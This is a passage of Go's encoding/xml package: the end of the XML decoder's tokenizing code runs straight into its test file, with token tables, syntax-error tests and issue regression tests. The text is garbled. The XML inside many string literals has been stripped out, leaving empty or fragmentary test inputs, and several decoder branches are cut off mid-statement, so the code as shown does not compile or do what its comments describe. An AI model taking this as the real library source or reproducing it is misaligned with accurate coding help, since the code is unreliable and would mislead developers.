name.Local: if !d.Strict { d.needClose = true d.toClose = t.Name t.Name = s.name return true } d.err = d.syntaxError("element <" + s.name.Local + "> closed by ") return false case s.name.Space != name.Space: ns := name.Space if name.Space == "" { ns = `""` } d.err = d.syntaxError("element <" + s.name.Local + "> in space " + s.name.Space + " closed by in space " + ns) return false } d.translate(&t.Name, true) // Pop stack until a Start or EOF is on the top, undoing the // translations that were associated with the element we just closed. for d.stk != nil && d.stk.kind != stkStart && d.stk.kind != stkEOF { s := d.pop() if s.ok { d.ns[s.name.Local] = s.name.Space } else { delete(d.ns, s.name.Local) } } return true } // If the top element on the stack is autoclosing and // t is not the end tag, invent the end tag. func (d *Decoder) autoClose(t Token) (Token, bool) { if d.stk == nil || d.stk.kind != stkStart { return nil, false } for _, s := range d.AutoClose { if strings.EqualFold(s, d.stk.name.Local) { // This one should be auto closed if t doesn't close it. et, ok := t.(EndElement) if !ok || !strings.EqualFold(et.Name.Local, d.stk.name.Local) { return EndElement{d.stk.name, et.Empty}, true } break } } return nil, false } var errRawToken = errors.New("xml: cannot use RawToken from UnmarshalXML method") // RawToken is like [Decoder.Token] but does not verify that // start and end elements match and does not translate // name space prefixes to their corresponding URLs. func (d *Decoder) RawToken() (Token, error) { if d.unmarshalDepth > 0 { return nil, errRawToken } return d.rawToken() } func (d *Decoder) rawToken() (Token, error) { if d.t != nil { return d.t.Token() } if d.err != nil { return nil, d.err } if d.needClose { // The last element we read was self-closing and // we returned just the StartElement half. // Return the EndElement half now. d.needClose = false return EndElement{d.toClose, true}, nil } b, ok := d.getc() if !ok { return nil, d.err } if b != '<' { // Text section. d.ungetc(b) data, origin := d.text(-1, false) if data == nil { return nil, d.err } return CharData{data: data, origin: origin}, nil } if b, ok = d.mustgetc(); !ok { return nil, d.err } switch b { case '/': // ' { d.err = d.syntaxError("invalid characters between ") return nil, d.err } return EndElement{name, false}, nil case '?': // ' { break } b0 = b } data := d.buf.Bytes() data = data[0 : len(data)-2] // chop ?> if target == "xml" { content := string(data) ver := procInst("version", content) if ver != "" && ver != "1.0" { d.err = fmt.Errorf("xml: unsupported version %q; only version 1.0 is supported", ver) return nil, d.err } enc := procInst("encoding", content) if enc != "" && enc != "utf-8" && enc != "UTF-8" && !strings.EqualFold(enc, "utf-8") { if d.CharsetReader == nil { d.err = fmt.Errorf("xml: encoding %q declared but Decoder.CharsetReader is nil", enc) return nil, d.err } newr, err := d.CharsetReader(enc, d.r.(io.Reader)) if err != nil { d.err = fmt.Errorf("xml: opening charset %q: %w", enc, err) return nil, d.err } if newr == nil { panic("CharsetReader returned a nil Reader for charset " + enc) } d.switchToReader(newr) } } return ProcInst{target, data}, nil case '!': // ' { d.err = d.syntaxError( `invalid sequence "--" not allowed in comments`) return nil, d.err } break } b0, b1 = b1, b } data := d.buf.Bytes() data = data[0 : len(data)-3] // chop --> return Comment(data), nil case '[': // . data, origin := d.text(-1, true) if data == nil { return nil, d.err } return CharData{data: data, origin: origin, cdata: true}, nil } // Probably a directive: , , etc. // We don't care, but accumulate for caller. Quoted angle // brackets do not count for nesting. d.buf.Reset() d.buf.WriteByte(b) inquote := uint8(0) depth := 0 for { if b, ok = d.mustgetc(); !ok { return nil, d.err } if inquote == 0 && b == '>' && depth == 0 { break } HandleB: d.buf.WriteByte(b) switch { case b == inquote: inquote = 0 case inquote != 0: // in quotes, no special action case b == '\'' || b == '"': inquote = b case b == '>' && inquote == 0: depth-- case b == '<' && inquote == 0: // Look for ` var testEntity = map[string]string{"何": "What", "is-it": "is it?"} var rawTokens = []Token{ CharData{data: []byte("\n")}, ProcInst{"xml", []byte(`version="1.0" encoding="UTF-8"`)}, CharData{data: []byte("\n")}, Directive(`DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"`), CharData{data: []byte("\n")}, StartElement{Name{"", "body"}, []Attr{{Name{"xmlns", "foo"}, "ns1", ""}, {Name{"", "xmlns"}, "ns2", ""}, {Name{"xmlns", "tag"}, "ns3", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"", "hello"}, []Attr{{Name{"", "lang"}, "en", ""}}, false, ""}, CharData{data: []byte("World <>'\" 白鵬翔"), origin: []byte("World <>'" 白鵬翔")}, EndElement{Name{"", "hello"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"", "query"}, []Attr{}, false, ""}, CharData{data: []byte("What is it?"), origin: []byte("&何; &is-it;")}, EndElement{Name{"", "query"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"", "goodbye"}, []Attr{}, true, " "}, EndElement{Name{"", "goodbye"}, true}, CharData{data: []byte("\n ")}, StartElement{Name{"", "outer"}, []Attr{{Name{"foo", "attr"}, "value", ""}, {Name{"xmlns", "tag"}, "ns4", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"", "inner"}, []Attr{}, true, ""}, EndElement{Name{"", "inner"}, true}, CharData{data: []byte("\n ")}, EndElement{Name{"", "outer"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"tag", "name"}, []Attr{}, false, ""}, CharData{data: []byte("\n ")}, CharData{data: []byte("Some text here."), cdata: true}, CharData{data: []byte("\n ")}, EndElement{Name{"tag", "name"}, false}, CharData{data: []byte("\n")}, EndElement{Name{"", "body"}, false}, Comment(" missing final newline "), } var cookedTokens = []Token{ CharData{data: []byte("\n")}, ProcInst{"xml", []byte(`version="1.0" encoding="UTF-8"`)}, CharData{data: []byte("\n")}, Directive(`DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"`), CharData{data: []byte("\n")}, StartElement{Name{"ns2", "body"}, []Attr{{Name{"xmlns", "foo"}, "ns1", ""}, {Name{"", "xmlns"}, "ns2", ""}, {Name{"xmlns", "tag"}, "ns3", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "hello"}, []Attr{{Name{"", "lang"}, "en", ""}}, false, ""}, CharData{data: []byte("World <>'\" 白鵬翔"), origin: []byte("World <>'" 白鵬翔")}, EndElement{Name{"ns2", "hello"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "query"}, []Attr{}, false, ""}, CharData{data: []byte("What is it?"), origin: []byte("&何; &is-it;")}, EndElement{Name{"ns2", "query"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "goodbye"}, []Attr{}, true, " "}, EndElement{Name{"ns2", "goodbye"}, true}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "outer"}, []Attr{{Name{"ns1", "attr"}, "value", ""}, {Name{"xmlns", "tag"}, "ns4", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "inner"}, []Attr{}, true, ""}, EndElement{Name{"ns2", "inner"}, true}, CharData{data: []byte("\n ")}, EndElement{Name{"ns2", "outer"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"ns3", "name"}, []Attr{}, false, ""}, CharData{data: []byte("\n ")}, CharData{data: []byte("Some text here."), cdata: true}, CharData{data: []byte("\n ")}, EndElement{Name{"ns3", "name"}, false}, CharData{data: []byte("\n")}, EndElement{Name{"ns2", "body"}, false}, Comment(" missing final newline "), } const testInputAltEncoding = ` VALUE` var rawTokensAltEncoding = []Token{ CharData{data: []byte("\n")}, ProcInst{"xml", []byte(`version="1.0" encoding="x-testing-uppercase"`)}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("value")}, EndElement{Name{"", "tag"}, false}, } var xmlInput = []string{ // unexpected EOF cases "<", "", "", "", // "", // let the Token() caller handle "", "", "", "", " c;", "", "", "", // "", // let the Token() caller handle "", "", "cdata]]>", } func TestRawToken(t *testing.T) { d := NewDecoder(strings.NewReader(testInput)) d.Entity = testEntity testRawToken(t, d, testInput, rawTokens) } const nonStrictInput = ` non&entity &unknown;entity { &#zzz; &なまえ3; <-gt; &; &0a; ` var nonStrictTokens = []Token{ CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("non&entity")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&unknown;entity")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("{")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&#zzz;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&なまえ3;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("<-gt;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&0a;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, } func TestNonStrictRawToken(t *testing.T) { d := NewDecoder(strings.NewReader(nonStrictInput)) d.Strict = false testRawToken(t, d, nonStrictInput, nonStrictTokens) } type downCaser struct { t *testing.T r io.ByteReader } func (d *downCaser) ReadByte() (c byte, err error) { c, err = d.r.ReadByte() if c >= 'A' && c <= 'Z' { c += 'a' - 'A' } return } func (d *downCaser) Read(p []byte) (int, error) { d.t.Fatalf("unexpected Read call on downCaser reader") panic("unreachable") } func TestRawTokenAltEncoding(t *testing.T) { d := NewDecoder(strings.NewReader(testInputAltEncoding)) d.CharsetReader = func(charset string, input io.Reader) (io.Reader, error) { if charset != "x-testing-uppercase" { t.Fatalf("unexpected charset %q", charset) } return &downCaser{t, input.(io.ByteReader)}, nil } testRawToken(t, d, testInputAltEncoding, rawTokensAltEncoding) } func TestRawTokenAltEncodingNoConverter(t *testing.T) { d := NewDecoder(strings.NewReader(testInputAltEncoding)) token, err := d.RawToken() if token == nil { t.Fatalf("expected a token on first RawToken call") } if err != nil { t.Fatal(err) } token, err = d.RawToken() if token != nil { t.Errorf("expected a nil token; got %#v", token) } if err == nil { t.Fatalf("expected an error on second RawToken call") } const encoding = "x-testing-uppercase" if !strings.Contains(err.Error(), encoding) { t.Errorf("expected error to contain %q; got error: %v", encoding, err) } } func testRawToken(t *testing.T, d *Decoder, raw string, rawTokens []Token) { lastEnd := int64(0) for i, want := range rawTokens { start := d.InputOffset() have, err := d.RawToken() end := d.InputOffset() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { var shave, swant string if _, ok := have.(CharData); ok { shave = fmt.Sprintf("CharData(%q)", have) } else { shave = fmt.Sprintf("%#v", have) } if _, ok := want.(CharData); ok { swant = fmt.Sprintf("CharData(%q)", want) } else { swant = fmt.Sprintf("%#v", want) } t.Errorf("token %d = %s, want %s", i, shave, swant) } // Check that InputOffset returned actual token. switch { case start < lastEnd: t.Errorf("token %d: position [%d,%d) for %T is before previous token", i, start, end, have) case start >= end: // Special case: EndElement can be synthesized. if start == end && end == lastEnd { break } t.Errorf("token %d: position [%d,%d) for %T is empty", i, start, end, have) case end > int64(len(raw)): t.Errorf("token %d: position [%d,%d) for %T extends beyond input", i, start, end, have) default: text := raw[start:end] if strings.ContainsAny(text, "<>") && (!strings.HasPrefix(text, "<") || !strings.HasSuffix(text, ">")) { t.Errorf("token %d: misaligned raw token %#q for %T", i, text, have) } } lastEnd = end } } // Ensure that directives (specifically !DOCTYPE) include the complete // text of any nested directives, noting that < and > do not change // nesting depth if they are in single or double quotes. var nestedDirectivesInput = ` ]> ">]> ]> '>]> ]> '>]> ]> ` var nestedDirectivesTokens = []Token{ CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, Directive(`DOCTYPE [">]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, Directive(`DOCTYPE ['>]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, Directive(`DOCTYPE ['>]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE []`), CharData{data: []byte("\n")}, } func TestNestedDirectives(t *testing.T) { d := NewDecoder(strings.NewReader(nestedDirectivesInput)) for i, want := range nestedDirectivesTokens { have, err := d.Token() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { t.Errorf("token %d = %#v want %#v", i, have, want) } } } func TestToken(t *testing.T) { d := NewDecoder(strings.NewReader(testInput)) d.Entity = testEntity for i, want := range cookedTokens { have, err := d.Token() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { t.Errorf("token %d = %#v want %#v", i, have, want) } } } func TestSyntax(t *testing.T) { for i := range xmlInput { d := NewDecoder(strings.NewReader(xmlInput[i])) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } if _, ok := err.(*SyntaxError); !ok { t.Fatalf(`xmlInput "%s": expected SyntaxError not received`, xmlInput[i]) } } } func TestInputLinePos(t *testing.T) { testInput := ` ` linePos := [][]int{ {1, 7}, {2, 1}, {3, 4}, {3, 6}, {6, 7}, {7, 1}, {8, 4}, {10, 4}, {10, 10}, {11, 1}, {11, 8}, } dec := NewDecoder(strings.NewReader(testInput)) for _, want := range linePos { if _, err := dec.Token(); err != nil { t.Errorf("Unexpected error: %v", err) continue } gotLine, gotCol := dec.InputPos() if gotLine != want[0] || gotCol != want[1] { t.Errorf("dec.InputPos() = %d,%d, want %d,%d", gotLine, gotCol, want[0], want[1]) } } } type allScalars struct { True1 bool True2 bool False1 bool False2 bool Int int Int8 int8 Int16 int16 Int32 int32 Int64 int64 Uint int Uint8 uint8 Uint16 uint16 Uint32 uint32 Uint64 uint64 Uintptr uintptr Float32 float32 Float64 float64 String string PtrString *string } var all = allScalars{ True1: true, True2: true, False1: false, False2: false, Int: 1, Int8: -2, Int16: 3, Int32: -4, Int64: 5, Uint: 6, Uint8: 7, Uint16: 8, Uint32: 9, Uint64: 10, Uintptr: 11, Float32: 13.0, Float64: 14.0, String: "15", PtrString: &sixteen, } var sixteen = "16" const testScalarsInput = ` true 1 false 0 1 -2 3 -4 5 6 7 8 9 10 11 12.0 13.0 14.0 15 16 ` func TestAllScalars(t *testing.T) { var a allScalars err := Unmarshal([]byte(testScalarsInput), &a) if err != nil { t.Fatal(err) } if !reflect.DeepEqual(a, all) { t.Errorf("have %+v want %+v", a, all) } } type item struct { FieldA string } func TestIssue569(t *testing.T) { data := `abcd` var i item err := Unmarshal([]byte(data), &i) if err != nil || i.FieldA != "abcd" { t.Fatal("Expecting abcd") } } func TestUnquotedAttrs(t *testing.T) { data := "" d := NewDecoder(strings.NewReader(data)) d.Strict = false token, err := d.Token() if _, ok := err.(*SyntaxError); ok { t.Errorf("Unexpected error: %v", err) } if token.(StartElement).Name.Local != "tag" { t.Errorf("Unexpected tag name: %v", token.(StartElement).Name.Local) } attr := token.(StartElement).Attr[0] if attr.Value != "azAZ09:-_" { t.Errorf("Unexpected attribute value: %v", attr.Value) } if attr.Name.Local != "attr" { t.Errorf("Unexpected attribute name: %v", attr.Name.Local) } } func TestValuelessAttrs(t *testing.T) { tests := [][3]string{ {"

", "p", "nowrap"}, {"

", "p", "nowrap"}, {"", "input", "checked"}, {"", "input", "checked"}, } for _, test := range tests { d := NewDecoder(strings.NewReader(test[0])) d.Strict = false token, err := d.Token() if _, ok := err.(*SyntaxError); ok { t.Errorf("Unexpected error: %v", err) } if token.(StartElement).Name.Local != test[1] { t.Errorf("Unexpected tag name: %v", token.(StartElement).Name.Local) } attr := token.(StartElement).Attr[0] if attr.Value != test[2] { t.Errorf("Unexpected attribute value: %v", attr.Value) } if attr.Name.Local != test[2] { t.Errorf("Unexpected attribute name: %v", attr.Name.Local) } } } func TestCopyTokenCharData(t *testing.T) { data := []byte("same data") var tok1 Token = CharData{data: data} tok2 := CopyToken(tok1) if !reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(CharData) != CharData") } data[1] = 'o' if reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(CharData) uses same buffer.") } } func TestCopyTokenStartElement(t *testing.T) { elt := StartElement{Name{"", "hello"}, []Attr{{Name{"", "lang"}, "en", ""}}, false, ""} var tok1 Token = elt tok2 := CopyToken(tok1) if tok1.(StartElement).Attr[0].Value != "en" { t.Error("CopyToken overwrote Attr[0]") } if !reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(StartElement) != StartElement") } tok1.(StartElement).Attr[0] = Attr{Name{"", "lang"}, "de", ""} if reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(CharData) uses same buffer.") } } func TestCopyTokenComment(t *testing.T) { data := []byte("") var tok1 Token = Comment(data) tok2 := CopyToken(tok1) if !reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(Comment) != Comment") } data[1] = 'o' if reflect.DeepEqual(tok1, tok2) { t.Error("CopyToken(Comment) uses same buffer.") } } func TestSyntaxErrorLineNum(t *testing.T) { testInput := "

Foo

\n\n

Bar\n" d := NewDecoder(strings.NewReader(testInput)) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } synerr, ok := err.(*SyntaxError) if !ok { t.Error("Expected SyntaxError.") } if synerr.Line != 3 { t.Error("SyntaxError didn't have correct line number.") } } func TestTrailingRawToken(t *testing.T) { input := ` ` d := NewDecoder(strings.NewReader(input)) var err error for _, err = d.RawToken(); err == nil; _, err = d.RawToken() { } if err != io.EOF { t.Fatalf("d.RawToken() = _, %v, want _, io.EOF", err) } } func TestTrailingToken(t *testing.T) { input := ` ` d := NewDecoder(strings.NewReader(input)) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } if err != io.EOF { t.Fatalf("d.Token() = _, %v, want _, io.EOF", err) } } func TestEntityInsideCDATA(t *testing.T) { input := `` d := NewDecoder(strings.NewReader(input)) var err error for _, err = d.Token(); err == nil; _, err = d.Token() { } if err != io.EOF { t.Fatalf("d.Token() = _, %v, want _, io.EOF", err) } } var characterTests = []struct { in string err string }{ {"\x12", "illegal character code U+0012"}, {"\x0b", "illegal character code U+000B"}, {"\xef\xbf\xbe", "illegal character code U+FFFE"}, {"\r\n\x07", "illegal character code U+0007"}, {"what's up", "expected attribute name in element"}, {"&abc\x01;", "invalid character entity &abc (no semicolon)"}, {"&\x01;", "invalid character entity & (no semicolon)"}, {"&\xef\xbf\xbe;", "invalid character entity &\uFFFE;"}, {"&hello;", "invalid character entity &hello;"}, } func TestDisallowedCharacters(t *testing.T) { for i, tt := range characterTests { d := NewDecoder(strings.NewReader(tt.in)) var err error for err == nil { _, err = d.Token() } synerr, ok := err.(*SyntaxError) if !ok { t.Fatalf("input %d d.Token() = _, %v, want _, *SyntaxError", i, err) } if synerr.Msg != tt.err { t.Fatalf("input %d synerr.Msg wrong: want %q, got %q", i, tt.err, synerr.Msg) } } } func TestIsInCharacterRange(t *testing.T) { invalid := []rune{ utf8.MaxRune + 1, 0xD800, // surrogate min 0xDFFF, // surrogate max -1, } for _, r := range invalid { if isInCharacterRange(r) { t.Errorf("rune %U considered valid", r) } } } var procInstTests = []struct { input string expect [2]string }{ {`version="1.0" encoding="utf-8"`, [2]string{"1.0", "utf-8"}}, {`version="1.0" encoding='utf-8'`, [2]string{"1.0", "utf-8"}}, {`version="1.0" encoding='utf-8' `, [2]string{"1.0", "utf-8"}}, {`version="1.0" encoding=utf-8`, [2]string{"1.0", ""}}, {`encoding="FOO" `, [2]string{"", "FOO"}}, {`version=2.0 version="1.0" encoding=utf-7 encoding='utf-8'`, [2]string{"1.0", "utf-8"}}, {`version= encoding=`, [2]string{"", ""}}, {`encoding="version=1.0"`, [2]string{"", "version=1.0"}}, {``, [2]string{"", ""}}, // TODO: what's the right approach to handle these nested cases? {`encoding="version='1.0'"`, [2]string{"1.0", "version='1.0'"}}, {`version="encoding='utf-8'"`, [2]string{"encoding='utf-8'", "utf-8"}}, } func TestProcInstEncoding(t *testing.T) { for _, test := range procInstTests { if got := procInst("version", test.input); got != test.expect[0] { t.Errorf("procInst(version, %q) = %q; want %q", test.input, got, test.expect[0]) } if got := procInst("encoding", test.input); got != test.expect[1] { t.Errorf("procInst(encoding, %q) = %q; want %q", test.input, got, test.expect[1]) } } } // Ensure that directives with comments include the complete // text of any nested directives. var directivesWithCommentsInput = ` ]> ]> --> --> []> ` var directivesWithCommentsTokens = []Token{ CharData{data: []byte("\n")}, Directive(`DOCTYPE [ ]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE [ ]`), CharData{data: []byte("\n")}, Directive(`DOCTYPE [ ]`), CharData{data: []byte("\n")}, } func TestDirectivesWithComments(t *testing.T) { d := NewDecoder(strings.NewReader(directivesWithCommentsInput)) for i, want := range directivesWithCommentsTokens { have, err := d.Token() if err != nil { t.Fatalf("token %d: unexpected error: %s", i, err) } if !reflect.DeepEqual(have, want) { t.Errorf("token %d = %#v want %#v", i, have, want) } } } // Writer whose Write method always returns an error. type errWriter struct{} func (errWriter) Write(p []byte) (n int, err error) { return 0, fmt.Errorf("unwritable") } func TestEscapeTextIOErrors(t *testing.T) { expectErr := "unwritable" err := EscapeText(errWriter{}, []byte{'A'}) if err == nil || err.Error() != expectErr { t.Errorf("have %v, want %v", err, expectErr) } } func TestEscapeTextInvalidChar(t *testing.T) { input := []byte("A \x00 terminated string.") expected := "A \uFFFD terminated string." buff := new(strings.Builder) if err := EscapeText(buff, input); err != nil { t.Fatalf("have %v, want nil", err) } text := buff.String() if text != expected { t.Errorf("have %v, want %v", text, expected) } } func TestIssue5880(t *testing.T) { type T []byte data, err := Marshal(T{192, 168, 0, 1}) if err != nil { t.Errorf("Marshal error: %v", err) } if !utf8.Valid(data) { t.Errorf("Marshal generated invalid UTF-8: %x", data) } } func TestIssue8535(t *testing.T) { type ExampleConflict struct { XMLName Name `xml:"example"` Link string `xml:"link"` AtomLink string `xml:"http://www.w3.org/2005/Atom link"` // Same name in a different name space } testCase := ` Example http://example.com/default http://example.com/home http://example.com/ns ` var dest ExampleConflict d := NewDecoder(strings.NewReader(testCase)) if err := d.Decode(&dest); err != nil { t.Fatal(err) } } func TestEncodeXMLNS(t *testing.T) { testCases := []struct { f func() ([]byte, error) want string ok bool }{ {encodeXMLNS1, `hello world`, true}, {encodeXMLNS2, `hello world`, true}, {encodeXMLNS3, `hello world`, true}, {encodeXMLNS4, `hello world`, false}, } for i, tc := range testCases { if b, err := tc.f(); err == nil { if got, want := string(b), tc.want; got != want { t.Errorf("%d: got %s, want %s \n", i, got, want) } } else { t.Errorf("%d: marshal failed with %s", i, err) } } } func encodeXMLNS1() ([]byte, error) { type T struct { XMLName Name `xml:"Test"` Ns string `xml:"xmlns,attr"` Body string } s := &T{Ns: "http://example.com/ns", Body: "hello world"} return Marshal(s) } func encodeXMLNS2() ([]byte, error) { type Test struct { Body string `xml:"http://example.com/ns body"` } s := &Test{Body: "hello world"} return Marshal(s) } func encodeXMLNS3() ([]byte, error) { type Test struct { XMLName Name `xml:"http://example.com/ns Test"` Body string } //s := &Test{XMLName: Name{"http://example.com/ns",""}, Body: "hello world"} is unusable as the "-" is missing // as documentation states s := &Test{Body: "hello world"} return Marshal(s) } func encodeXMLNS4() ([]byte, error) { type Test struct { Ns string `xml:"xmlns,attr"` Body string } s := &Test{Ns: "http://example.com/ns", Body: "hello world"} return Marshal(s) } func TestIssue11405(t *testing.T) { testCases := []string{ "", "", "", } for _, tc := range testCases { d := NewDecoder(strings.NewReader(tc)) var err error for { _, err = d.Token() if err != nil { break } } if _, ok := err.(*SyntaxError); !ok { t.Errorf("%s: Token: Got error %v, want SyntaxError", tc, err) } } } func TestIssue12417(t *testing.T) { testCases := []struct { s string ok bool }{ {``, true}, {``, true}, {``, true}, {``, false}, } for _, tc := range testCases { d := NewDecoder(strings.NewReader(tc.s)) var err error for { _, err = d.Token() if err != nil { if err == io.EOF { err = nil } break } } if err != nil && tc.ok { t.Errorf("%q: Encoding charset: expected no error, got %s", tc.s, err) continue } if err == nil && !tc.ok { t.Errorf("%q: Encoding charset: expected error, got nil", tc.s) } } } func TestIssue7113(t *testing.T) { type C struct { XMLName Name `xml:""` // Sets empty namespace } type D struct { XMLName Name `xml:"d"` } type A struct { XMLName Name `xml:""` C C `xml:""` D D } var a A structSpace := "b" xmlTest := `` t.Log(xmlTest) err := Unmarshal([]byte(xmlTest), &a) if err != nil { t.Fatal(err) } if a.XMLName.Space != structSpace { t.Errorf("overidding with empty namespace: unmarshaling, got %s, want %s\n", a.XMLName.Space, structSpace) } if len(a.C.XMLName.Space) != 0 { t.Fatalf("overidding with empty namespace: unmarshaling, got %s, want empty\n", a.C.XMLName.Space) } var b []byte b, err = Marshal(&a) if err != nil { t.Fatal(err) } if len(a.C.XMLName.Space) != 0 { t.Errorf("overidding with empty namespace: marshaling, got %s in C tag which should be empty\n", a.C.XMLName.Space) } if string(b) != xmlTest { t.Fatalf("overidding with empty namespace: marshaling, got %s, want %s\n", b, xmlTest) } var c A err = Unmarshal(b, &c) if err != nil { t.Fatalf("second Unmarshal failed: %s", err) } if c.XMLName.Space != "b" { t.Errorf("overidding with empty namespace: after marshaling & unmarshaling, XML name space: got %s, want %s\n", a.XMLName.Space, structSpace) } if len(c.C.XMLName.Space) != 0 { t.Errorf("overidding with empty namespace: after marshaling & unmarshaling, got %s, want empty\n", a.C.XMLName.Space) } } func TestIssue20396(t *testing.T) { var attrError = UnmarshalError("XML syntax error on line 1: expected attribute name in element") testCases := []struct { s string wantErr error }{ {``, // Issue 20396 UnmarshalError("XML syntax error on line 1: expected element name after <")}, {``, attrError}, {``, attrError}, {``, nil}, {`1`, UnmarshalError("XML syntax error on line 1: expected element name after <")}, {`1`, attrError}, {`1`, attrError}, {`1`, nil}, } var dest string for _, tc := range testCases { if got, want := Unmarshal([]byte(tc.s), &dest), tc.wantErr; got != want { if got == nil { t.Errorf("%s: Unexpected success, want %v", tc.s, want) } else if want == nil { t.Errorf("%s: Unexpected error, got %v", tc.s, got) } else if got.Error() != want.Error() { t.Errorf("%s: got %v, want %v", tc.s, got, want) } } } } func TestIssue20685(t *testing.T) { testCases := []struct { s string ok bool }{ {`one`, false}, {`one`, true}, {`one`, false}, {`one`, false}, {`one`, false}, {`one`, false}, {`one`, false}, } for _, tc := range testCases { d := NewDecoder(strings.NewReader(tc.s)) var err error for { _, err = d.Token() if err != nil { if err == io.EOF { err = nil } break } } if err != nil && tc.ok { t.Errorf("%q: Closing tag with namespace : expected no error, got %s", tc.s, err) continue } if err == nil && !tc.ok { t.Errorf("%q: Closing tag with namespace : expected error, got nil", tc.s) } } } func tokenMap(mapping func(t Token) Token) func(TokenReader) TokenReader { return func(src TokenReader) TokenReader { return mapper{ t: src, f: mapping, } } } type mapper struct { t TokenReader f func(Token) Token } func (m mapper) Token() (Token, error) { tok, err := m.t.Token() if err != nil { return nil, err } return m.f(tok), nil } func TestNewTokenDecoderIdempotent(t *testing.T) { d := NewDecoder(strings.NewReader(`
`)) d2 := NewTokenDecoder(d) if d != d2 { t.Error("NewTokenDecoder did not detect underlying Decoder") } } func TestWrapDecoder(t *testing.T) { d := NewDecoder(strings.NewReader(`[Re-enter Clown with a letter, and FABIAN]`)) m := tokenMap(func(t Token) Token { switch tok := t.(type) { case StartElement: if tok.Name.Local == "quote" { tok.Name.Local = "blocking" return tok } case EndElement: if tok.Name.Local == "quote" { tok.Name.Local = "blocking" return tok } } return t }) d = NewTokenDecoder(m(d)) o := struct { XMLName Name `xml:"blocking"` Chardata string `xml:",chardata"` }{} if err := d.Decode(&o); err != nil { t.Fatal("Got unexpected error while decoding:", err) } if o.Chardata != "[Re-enter Clown with a letter, and FABIAN]" { t.Fatalf("Got unexpected chardata: `%s`\n", o.Chardata) } } type tokReader struct{} func (tokReader) Token() (Token, error) { return StartElement{}, nil } type Failure struct{} func (Failure) UnmarshalXML(*Decoder, StartElement) error { return nil } func TestTokenUnmarshaler(t *testing.T) { defer func() { if r := recover(); r != nil { t.Error("Unexpected panic using custom token unmarshaler") } }() d := NewTokenDecoder(tokReader{}) d.Decode(&Failure{}) } func testRoundTrip(t *testing.T, input string) { d := NewDecoder(strings.NewReader(input)) var tokens []Token var buf bytes.Buffer e := NewEncoder(&buf) for { tok, err := d.Token() if err == io.EOF { break } if err != nil { t.Fatalf("invalid input: %v", err) } if err := e.EncodeToken(tok); err != nil { t.Fatalf("failed to re-encode input: %v", err) } tokens = append(tokens, CopyToken(tok)) } if err := e.Flush(); err != nil { t.Fatal(err) } d = NewDecoder(&buf) for { tok, err := d.Token() if err == io.EOF { break } if err != nil { t.Fatalf("failed to decode output: %v", err) } if len(tokens) == 0 { t.Fatalf("unexpected token: %#v", tok) } a, b := tokens[0], tok if !reflect.DeepEqual(a, b) { t.Fatalf("token mismatch: %#v vs %#v", a, b) } tokens = tokens[1:] } if len(tokens) > 0 { t.Fatalf("lost tokens: %#v", tokens) } } func TestRoundTrip(t *testing.T) { tests := map[string]string{ "trailing colon": ``, "comments in directives": `--x --> > --x ]>`, } for name, input := range tests { t.Run(name, func(t *testing.T) { testRoundTrip(t, input) }) } } func TestParseErrors(t *testing.T) { withDefaultHeader := func(s string) string { return `` + s } tests := []struct { src string err string }{ {withDefaultHeader(``), `unexpected end element `}, {withDefaultHeader(``), `element in space x closed by in space y`}, {withDefaultHeader(``), `expected target name after `), `invalid sequence 